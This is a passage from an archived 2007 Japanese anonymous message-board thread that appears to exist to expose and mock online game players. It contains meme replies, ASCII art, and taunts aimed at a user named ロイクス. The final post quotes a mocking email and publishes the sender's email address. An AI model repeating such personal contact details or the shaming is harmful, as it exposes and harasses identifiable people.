こういうキモイ性格の奴のが嫌いだ。
自分はまともだって勘違いしてるんだぜ。

437 :名無しさん@ゴーゴーゴーゴー!:2007/01/07(日) 01:17:40 ID:O1Q7vgQf
お前ら…俺の名を言ってみろ

438 :名無しさん@ゴーゴーゴーゴー!:2007/01/07(日) 01:28:32 ID:mAWom5DC
>>437

し、知ってる ぐっ、まってくれ

439 :名無しさん@ゴーゴーゴーゴー!:2007/01/07(日) 02:26:02 ID:gAdShS5E
>>437
桃栗三年柿八年子!

440 :名無しさん@ゴーゴーゴーゴー!:2007/01/07(日) 02:28:01 ID:ZeKQ2/ns
>>437
焼け石に水子

441 :名無しさん@ゴーゴーゴーゴー!:2007/01/07(日) 09:28:45 ID:kWLlG9tx
>>437
ポンチャイ

442 :名無しさん@ゴーゴーゴーゴー!:2007/01/07(日) 11:27:07 ID:93T0GHpD
>>437
キム・ジョンイル

443 :名無しさん@ゴーゴーゴーゴー!:2007/01/07(日) 13:03:19 ID:pJ1mDD99
>>Freestyle

444 :名無しさん@ゴーゴーゴーゴー!:2007/01/07(日) 14:24:35 ID:mXCEJzMT
俺の名前は俺

445 :名無しさん@ゴーゴーゴーゴー!:2007/01/07(日) 14:47:23 ID:swETqBTv
何この流れ

446 :名無しさん@ゴーゴーゴーゴー!:2007/01/07(日) 14:58:48 ID:QPaB6OjE
<<受け入れるんだ、これがGAだ>>

447 :名無しさん@ゴーゴーゴーゴー!:2007/01/07(日) 17:34:10 ID:nP6t5RSv
                 ′  ,イ
                 //l//                   . -−―‐ 、
  /   |  ┼          /              .  ´。゚。゚/ ̄ ̄ヽ 丶、
  \   l  d‐  ロ        /              ∠_`i〃 // ̄`ヽ 」   ヽ.
            イ         7_           ., ' ニミi」{{∠∠ニ二 _    li |i '.
   _l,. ┐┼┴、  ク        /        / . -  ,. -――‐ 、`ヽ  |l lj  i
.   /|  l/ |  ‐'  ス       /        /´ __/ ____    ヽ   lj  - 、!
.           |       /        //´  _/      `ヽ _|   / , -、ヽ
   |   /   |       i-<⌒ヽ、   / { ー{            }_|    /⌒ヽ i
   |   \         l/`ヽ.__}   i |\ ‐ヽ  ,. --、  , ---、| |i  { - 、  l
   |    __l__        .> ,ハ   ! ',  `ー ' /.::::::::::し' .::::::::::| u   ) l |
   |   -ゝ-       { /   〉  .', ',    {::::::::::::::::__::::::::}  r‐、__ノ
   |  (´__        .ゝ  /}   . ',   /⌒i, 一ァ'´   /⌒/   ヽ._/
       ‐一ァ       {     , ′   ′ V⌒l/  ′ /⌒ ′  /
.   ̄ ̄)   /          ゝ /        ヽ ヽ `ー‐一'´  /    ′
     ´    {_         {‐'´  , -― 、  \` ̄ ̄ ̄ ̄´     |     /
  ////              \-‐/: : : : : : : \_ 丶、___ -‐''´   ヾフ´ン': : /
  ・・・・               __V: : : : : : : : / : : :\_/      /    // : / :
                /!: : : :/ : : : : : : /: / ̄ ̄{    ∠ -‐ァ'´: : : : : : : : :
               /  l : : 〈 : / . : : : : :/  ̄ ̄ ̄ヽ_/   /: : : : : : : : : : :
/|/ ̄|/ ̄ ̄`Y´    |: : : :∨ : : : : : : : \           /: : : : : : : : : :

448 :名無しさん@ゴーゴーゴーゴー!:2007/01/07(日) 21:15:44 ID:4qdPpmqC
http://www.uploda.org/uporg646205.jpg
呼んだか?

449 :名無しさん@ゴーゴーゴーゴー!:2007/01/07(日) 21:32:03 ID:PwVuvRvG
>>448
しつけー

450 :名無しさん@ゴーゴーゴーゴー!:2007/01/07(日) 21:35:55 ID:nP6t5RSv
                              人_ト、__ノ、_,ヘノ\_ノヽノ、
                             人/                \__
             / ̄ ̄ ̄ ̄ ̄\      _ノ      >>449              
     __ ( 人__ つくし  _) __  _)
  / ̄| | .   |/.  -◎─◎- ヽ|  | __ノ お ま え ロイクス さ ん に
/     | | (6|    (_   _)    |6)|  |ノ
\\   | |  | (  ∴) 3 (∴  ) リ < な ん つ っ た ぁ −−−−−っ!!
  \\.| |   ヾ\   ,___,.   .ノ 〃 |  ) 
、   \ノ^,ニ‐-ァ  ̄`ー-----一' ̄/  | ^ヽ 
\  // ,/⌒i、_\\_____//  .|  |  ⌒)
   {   i   |  iヽ`ー-----― '    |  |    ̄ヽヘ/⌒ヽ/\i'\へ/⌒Yヽ'^

451 :ロイクス:2007/01/07(日) 22:22:08 ID:+eRXchJB
俺宛にこんなメールきたぞ。


mabinogi1130@yahoo.co.jp ←こいつ誰?
 
ロイクスたん晒しスレで人気ですね(^ω^)

これからもその痛い消防さを貫いてください(^ω^)

91 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)